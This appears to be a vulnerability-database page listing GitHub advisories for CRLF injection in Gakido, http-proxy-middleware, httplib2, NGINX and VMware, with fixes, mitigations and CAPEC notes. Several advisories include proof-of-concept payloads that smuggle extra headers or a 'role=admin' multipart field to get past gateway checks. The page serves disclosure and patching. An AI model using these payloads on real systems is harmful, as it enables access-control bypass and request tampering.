    "nvd_published_at": "2026-01-27T01:16:02Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was discovered in Gakido that allowed HTTP Header Injection through CRLF (Carriage Return Line Feed) sequences in user-supplied header values and names.\n\nWhen making HTTP requests with user-controlled header values containing `\\r\\n` (CRLF), `\\n` (LF), or `\\x00` (null byte) characters, an attacker could inject arbitrary HTTP headers into the request.\n\n## Impact\n\nAn attacker who can control header values passed to Gakido\u0027s `Client.get()`, `Client.post()`, or other request methods could:\n\n1. **Inject arbitrary HTTP headers** - Add malicious headers to requests\n2. **HTTP Response Splitting** - Potentially manipulate responses in certain proxy configurations\n3. **Cache Poisoning** - Inject headers that could poison intermediate caches\n4. **Session Fixation** - Inject session-related headers\n5. **Bypass Security Controls** - Inject headers that bypass server-side security checks\n\n## Proof of Concept\n\n```python\nfrom gakido import Client\n\n# Before fix: X-Injected header would be sent as a separate header\nc = Client(impersonate=\"chrome_120\")\nr = c.get(\"https://httpbin.org/headers\", headers={\n    \"User-Agent\": \"test\\r\\nX-Injected: pwned\"\n})\n\n# The server would receive:\n# User-Agent: test\n# X-Injected: pwned\n```\n\n## Affected Code\n\nThe vulnerability existed in the header processing logic where user-supplied headers were not sanitized before being sent in HTTP requests.\n\n**File:** `gakido/headers.py`  \n**Function:** `canonicalize_headers()`\n\n## Fix\n\nThe fix adds a `_sanitize_header()` function that strips `\\r`, `\\n`, and `\\x00` characters from both header names and values before they are included in HTTP requests.\n\n```python\ndef _sanitize_header(name: str, value: str) -\u003e tuple[str, str]:\n    \"\"\"\n    Sanitize header name and value to prevent HTTP header injection (CRLF injection).\n    Strips CR, LF, and null bytes from both name and value.\n    \"\"\"\n    clean_name = name.replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"\\x00\", \"\")\n    clean_value = value.replace(\"\\r\", \"\").replace(\"\\n\", \"\").replace(\"\\x00\", \"\")\n    return clean_name, clean_value\n```",
  "id": "GHSA-gcgx-chcp-hxp9",
  "modified": "2026-01-29T03:25:02Z",
  "published": "2026-01-26T23:29:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/HappyHackingSpace/gakido/security/advisories/GHSA-gcgx-chcp-hxp9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24489"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HappyHackingSpace/gakido/commit/369c67e67c63da510c8a9ab021e54a92ccf1f788"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/HappyHackingSpace/gakido"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HappyHackingSpace/gakido/releases/tag/v0.1.1-1bc6019"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gakido vulnerable to HTTP Header Injection (CRLF Injection) "
}

GHSA-GCQ2-9PQ2-CXQM

Vulnerability from github – Published: 2026-06-18 13:06 – Updated: 2026-06-18 13:06
VLAI
Summary
http-proxy-middleware: multipart/form-data field injection via unescaped CRLF in `fixRequestBody`
Details

Summary

fixRequestBody() is the library's documented helper for re-emitting a request body that was already consumed by a body parser. When the outgoing Content-Type is multipart/form-data, it rebuilds the body with handlerFormDataBodyData(), which interpolates each req.body key and value directly into the multipart wire format without neutralizing CR/LF:

// dist/handlers/fix-request-body.js
function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key}"\r\n\r\n${value}\r\n`;
  }
}

A \r\n inside a value (or key) lets an attacker close the current part and inject an entirely new form part. Because the proxy's own body parser saw a single opaque value, any gateway-side policy or validation performed on req.body is evaluated against a different set of fields than the upstream backend ultimately parses a request/parameter desynchronization across the trust boundary.

By contrast, the sibling output branches are safe: application/json uses JSON.stringify (escapes control chars) and application/x-www-form-urlencoded uses querystring.stringify (percent-encodes). Only the multipart branch lacks escaping.

Preconditions

All three must hold; this narrows real-world exposure and is the basis for AC:H: 1. The proxy app populates req.body with a non-multipart parser (express.urlencoded, express.json, or text) so an injected boundary in a value is not split on input. 2. The proxied (outgoing) request is sent as multipart/form-data (e.g. an adaptation layer, or any flow that sets the upstream content-type to multipart), so the vulnerable branch runs. 3. The app calls fixRequestBody (the documented pattern for "I body-parsed, now re-stream"), and an attacker controls at least one body field value or key.

Note: a pure multipart-in → multipart-out flow (e.g. multer) is generally not exploitable for a new-field injection, because the proxy's multipart parser already splits the injected boundary, so req.body and the backend agree. The desync specifically requires a non-multipart input parser.

Impact

When the preconditions hold, an attacker injects/overrides multipart fields seen only by the backend: - Validation / access-control bypass bypass gateway-side field checks (demonstrated below: a gateway that forbids role=admin is bypassed; backend grants admin). - Parameter tampering add or overwrite fields the backend trusts (IDs, flags, prices). - File-part injection inject a filename="..." part into the upstream multipart stream.

Proof of Concept

// npm i http-proxy-middleware@4.0.0   (Node ESM: save as minimal.mjs)
import { fixRequestBody } from 'http-proxy-middleware';

// `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it.
// The attacker sent  user=alice%0D%0A--BB%0D%0A...  so this ONE field's value holds CRLF:
const req = { readableLength: 0, body: {
  user: 'alice\r\n--BB\r\nContent-Disposition: form-data; name="role"\r\n\r\nadmin\r\n--BB--'
}};

// Minimal stand-in for the outgoing proxy request; capture what gets written.
const out = [];
const proxyReq = {
  h: { 'content-type': 'multipart/form-data; boundary=BB' },
  getHeader(n){ return this.h[n.toLowerCase()]; },
  setHeader(n,v){ this.h[n.toLowerCase()] = v; },
  write(d){ out.push(Buffer.from(d)); },
};

fixRequestBody(proxyReq, req);          // library rebuilds the multipart body
console.log(Buffer.concat(out).toString());

Output: one input field becomes two parts; role=admin was injected via the unescaped CRLF:

--BB
Content-Disposition: form-data; name="user"

alice
--BB
Content-Disposition: form-data; name="role"     <-- injected part; never present in req.body's keys
admin
--BB--

req.body had a single key (user), so any gateway policy checking req.body.role passes, yet the backend's multipart parser receives role=admin. On the wire the attacker simply sends, as application/x-www-form-urlencoded: user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name="role"%0D%0A%0D%0Aadmin%0D%0A--BB--

Remediation

Neutralize CR/LF (and ") in keys/values before interpolation, or build the body with a real multipart encoder (e.g. FormData / form-data) instead of string concatenation. Minimal fix:

function handlerFormDataBodyData(contentType, data) {
  const boundary = contentType.replace(/^.*boundary=(.*)$/, '$1');
  const bad = /[\r\n]/;
  let str = '';
  for (const [key, value] of Object.entries(data)) {
    const v = String(value);
    if (bad.test(key) || bad.test(v)) {
      throw new Error('fixRequestBody: CR/LF not allowed in multipart field name/value');
    }
    str += `--${boundary}\r\nContent-Disposition: form-data; name="${key.replace(/"/g, '%22')}"\r\n\r\n${v}\r\n`;
  }
}

(Reject is preferable to silent stripping, to avoid masking malicious input.)

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "http-proxy-middleware"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.4"
            },
            {
              "fixed": "3.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "http-proxy-middleware"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55603"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T13:06:21Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n`fixRequestBody()` is the library\u0027s documented helper for re-emitting a request body that was already consumed by a body parser. When the **outgoing** `Content-Type` is `multipart/form-data`, it rebuilds the body with `handlerFormDataBodyData()`, which interpolates each `req.body` key and value directly into the multipart wire format **without neutralizing CR/LF**:\n\n```js\n// dist/handlers/fix-request-body.js\nfunction handlerFormDataBodyData(contentType, data) {\n  const boundary = contentType.replace(/^.*boundary=(.*)$/, \u0027$1\u0027);\n  let str = \u0027\u0027;\n  for (const [key, value] of Object.entries(data)) {\n    str += `--${boundary}\\r\\nContent-Disposition: form-data; name=\"${key}\"\\r\\n\\r\\n${value}\\r\\n`;\n  }\n}\n```\n\nA `\\r\\n` inside a value (or key) lets an attacker close the current part and inject an **entirely new form part**. Because the proxy\u0027s own body parser saw a single opaque value, any gateway-side policy or validation performed on `req.body` is evaluated against a different set of fields than the upstream backend ultimately parses a request/parameter desynchronization across the trust boundary.\n\nBy contrast, the sibling output branches are safe: `application/json` uses `JSON.stringify` (escapes control chars) and `application/x-www-form-urlencoded` uses `querystring.stringify` (percent-encodes). Only the multipart branch lacks escaping.\n\n## Preconditions \nAll three must hold; this narrows real-world exposure and is the basis for `AC:H`:\n1. The proxy app populates `req.body` with a **non-multipart** parser (`express.urlencoded`, `express.json`, or text) so an injected boundary in a value is **not** split on input.\n2. The proxied (outgoing) request is sent as **`multipart/form-data`** (e.g. an adaptation layer, or any flow that sets the upstream content-type to multipart), so the vulnerable branch runs.\n3. The app calls `fixRequestBody` (the documented pattern for \"I body-parsed, now re-stream\"), and an attacker controls at least one body field value or key.\n\n\u003e Note: a pure multipart-in \u2192 multipart-out flow (e.g. `multer`) is generally **not** exploitable for a *new-field* injection, because the proxy\u0027s multipart parser already splits the injected boundary, so `req.body` and the backend agree. The desync specifically requires a non-multipart input parser.\n\n## Impact\nWhen the preconditions hold, an attacker injects/overrides multipart fields seen only by the backend:\n- **Validation / access-control bypass** bypass gateway-side field checks (demonstrated below: a gateway that forbids `role=admin` is bypassed; backend grants admin).\n- **Parameter tampering** add or overwrite fields the backend trusts (IDs, flags, prices).\n- **File-part injection** inject a `filename=\"...\"` part into the upstream multipart stream.\n\n## Proof of Concept\n\n```js\n// npm i http-proxy-middleware@4.0.0   (Node ESM: save as minimal.mjs)\nimport { fixRequestBody } from \u0027http-proxy-middleware\u0027;\n\n// `req.body` as a NON-multipart parser (express.urlencoded / express.json) yields it.\n// The attacker sent  user=alice%0D%0A--BB%0D%0A...  so this ONE field\u0027s value holds CRLF:\nconst req = { readableLength: 0, body: {\n  user: \u0027alice\\r\\n--BB\\r\\nContent-Disposition: form-data; name=\"role\"\\r\\n\\r\\nadmin\\r\\n--BB--\u0027\n}};\n\n// Minimal stand-in for the outgoing proxy request; capture what gets written.\nconst out = [];\nconst proxyReq = {\n  h: { \u0027content-type\u0027: \u0027multipart/form-data; boundary=BB\u0027 },\n  getHeader(n){ return this.h[n.toLowerCase()]; },\n  setHeader(n,v){ this.h[n.toLowerCase()] = v; },\n  write(d){ out.push(Buffer.from(d)); },\n};\n\nfixRequestBody(proxyReq, req);          // library rebuilds the multipart body\nconsole.log(Buffer.concat(out).toString());\n```\n\nOutput: one input field becomes **two** parts; `role=admin` was injected via the unescaped CRLF:\n\n```\n--BB\nContent-Disposition: form-data; name=\"user\"\n\nalice\n--BB\nContent-Disposition: form-data; name=\"role\"     \u003c-- injected part; never present in req.body\u0027s keys\nadmin\n--BB--\n```\n\n`req.body` had a single key (`user`), so any gateway policy checking `req.body.role` passes, yet the backend\u0027s multipart parser receives `role=admin`. On the wire the attacker simply sends, as `application/x-www-form-urlencoded`: `user=alice%0D%0A--BB%0D%0AContent-Disposition:%20form-data;%20name=\"role\"%0D%0A%0D%0Aadmin%0D%0A--BB--`\n\n## Remediation\nNeutralize CR/LF (and `\"`) in keys/values before interpolation, or build the body with a real multipart encoder (e.g. `FormData` / `form-data`) instead of string concatenation. Minimal fix:\n\n```js\nfunction handlerFormDataBodyData(contentType, data) {\n  const boundary = contentType.replace(/^.*boundary=(.*)$/, \u0027$1\u0027);\n  const bad = /[\\r\\n]/;\n  let str = \u0027\u0027;\n  for (const [key, value] of Object.entries(data)) {\n    const v = String(value);\n    if (bad.test(key) || bad.test(v)) {\n      throw new Error(\u0027fixRequestBody: CR/LF not allowed in multipart field name/value\u0027);\n    }\n    str += `--${boundary}\\r\\nContent-Disposition: form-data; name=\"${key.replace(/\"/g, \u0027%22\u0027)}\"\\r\\n\\r\\n${v}\\r\\n`;\n  }\n}\n```\n(Reject is preferable to silent stripping, to avoid masking malicious input.)",
  "id": "GHSA-gcq2-9pq2-cxqm",
  "modified": "2026-06-18T13:06:21Z",
  "published": "2026-06-18T13:06:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/chimurai/http-proxy-middleware/security/advisories/GHSA-gcq2-9pq2-cxqm"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/chimurai/http-proxy-middleware"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "http-proxy-middleware: multipart/form-data field injection via unescaped CRLF in `fixRequestBody`"
}

GHSA-GG84-QGV9-W4PQ

Vulnerability from github – Published: 2020-05-20 15:55 – Updated: 2024-09-20 21:55
VLAI
Summary
CRLF injection in httplib2
Details

Impact

Attacker controlling unescaped part of uri for httplib2.Http.request() could change request headers and body, send additional hidden requests to same server.

Impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.

Patches

Problem has been fixed in 0.18.0 Space, CR, LF characters are now quoted before any use. This solution should not impact any valid usage of httplib2 library, that is uri constructed by urllib.

Workarounds

Create URI with urllib.parse family functions: urlencode, urlunsplit.

user_input = " HTTP/1.1\r\ninjected: attack\r\nignore-http:"
-uri = "https://api.server/?q={}".format(user_input)
+uri = urllib.parse.urlunsplit(("https", "api.server", "/v1", urllib.parse.urlencode({"q": user_input}), ""))
http.request(uri)

References

https://cwe.mitre.org/data/definitions/93.html https://docs.python.org/3/library/urllib.parse.html

Thanks to Recar https://github.com/Ciyfly for finding vulnerability and discrete notification.

For more information

If you have any questions or comments about this advisory: * Open an issue in httplib2 * Email current maintainer at 2020-05

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "httplib2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-11078"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-05-20T15:55:36Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Impact\nAttacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server.\n\nImpacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping.\n\n### Patches\nProblem has been fixed in 0.18.0\nSpace, CR, LF characters are now quoted before any use.\nThis solution should not impact any valid usage of httplib2 library, that is uri constructed by urllib.\n\n### Workarounds\nCreate URI with `urllib.parse` family functions: `urlencode`, `urlunsplit`.\n\n```diff\nuser_input = \" HTTP/1.1\\r\\ninjected: attack\\r\\nignore-http:\"\n-uri = \"https://api.server/?q={}\".format(user_input)\n+uri = urllib.parse.urlunsplit((\"https\", \"api.server\", \"/v1\", urllib.parse.urlencode({\"q\": user_input}), \"\"))\nhttp.request(uri)\n```\n\n### References\nhttps://cwe.mitre.org/data/definitions/93.html\nhttps://docs.python.org/3/library/urllib.parse.html\n\nThanks to Recar https://github.com/Ciyfly for finding vulnerability and discrete notification.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)\n* Email [current maintainer at 2020-05](mailto:temotor@gmail.com)",
  "id": "GHSA-gg84-qgv9-w4pq",
  "modified": "2024-09-20T21:55:12Z",
  "published": "2020-05-20T15:55:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-gg84-qgv9-w4pq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11078"
    },
    {
      "type": "WEB",
      "url": "https://github.com/httplib2/httplib2/commit/a1457cc31f3206cf691d11d2bf34e98865873e9e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/httplib2/httplib2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2020-46.yaml"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r23711190c2e98152cb6f216b95090d5eeb978543bb7e0bad22ce47fc@%3Cissues.beam.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r4d35dac106fab979f0db75a07fc4e320ad848b722103e79667ff99e1@%3Cissues.beam.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r69a462e690b5f2c3d418a288a2c98ae764d58587bd0b5d6ab141f25f@%3Cissues.beam.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r7f364000066748299b331b615ba51c62f55ab5b201ddce9a22d98202@%3Cissues.beam.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rad8872fc99f670958c2774e2bf84ee32a3a0562a0c787465cf3dfa23@%3Cissues.beam.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rc9eff9572946142b657c900fe63ea4bbd3535911e8d4ce4d08fe4b89@%3Ccommits.allura.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00000.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IXCX2AWROGWGY5GXR7VN3BKF34A2FO6J"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PZJ3D6JSM7CFZESZZKGUW2VX55BOSOXI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "CRLF injection in httplib2"
}

GHSA-GGR6-FMR8-2M8G

Vulnerability from github – Published: 2026-03-24 15:30 – Updated: 2026-03-24 15:30
VLAI
Details

NGINX Plus and NGINX Open Source have a vulnerability in the ngx_mail_smtp_module module due to the improper handling of CRLF sequences in DNS responses. This allows an attacker-controlled DNS server to inject arbitrary headers into SMTP upstream requests, leading to potential request manipulation. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-28753"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-24T15:16:33Z",
    "severity": "MODERATE"
  },
  "details": "NGINX Plus and NGINX Open Source have a vulnerability in the ngx_mail_smtp_module module due to the improper handling of CRLF sequences in DNS responses. This allows an attacker-controlled DNS server to inject arbitrary headers into SMTP upstream requests, leading to potential request manipulation. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.",
  "id": "GHSA-ggr6-fmr8-2m8g",
  "modified": "2026-03-24T15:30:29Z",
  "published": "2026-03-24T15:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28753"
    },
    {
      "type": "WEB",
      "url": "https://my.f5.com/manage/s/article/K000160367"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-GV3R-Q3Q8-2H79

Vulnerability from github – Published: 2022-05-14 02:46 – Updated: 2022-05-14 02:46
VLAI
Details

CRLF injection vulnerability in VMware vCenter Server 6.0 before U2 and ESXi 6.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-5331"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-08-08T01:59:00Z",
    "severity": "MODERATE"
  },
  "details": "CRLF injection vulnerability in VMware vCenter Server 6.0 before U2 and ESXi 6.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via unspecified vectors.",
  "id": "GHSA-gv3r-q3q8-2h79",
  "modified": "2022-05-14T02:46:13Z",
  "published": "2022-05-14T02:46:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5331"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/138211/VMware-vSphere-Hypervisor-ESXi-HTTP-Response-Injection.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2016/Aug/38"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/539128/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/92324"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1036543"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1036544"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1036545"
    },
    {
      "type": "WEB",
      "url": "http://www.vmware.com/security/advisories/VMSA-2016-0010.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

Avoid using CRLF as a special sequence.

Mitigation
Implementation

Appropriately filter or quote CRLF sequences in user-controlled input.

CAPEC-15: Command Delimiters

An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.

CAPEC-81: Web Server Logs Tampering

Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.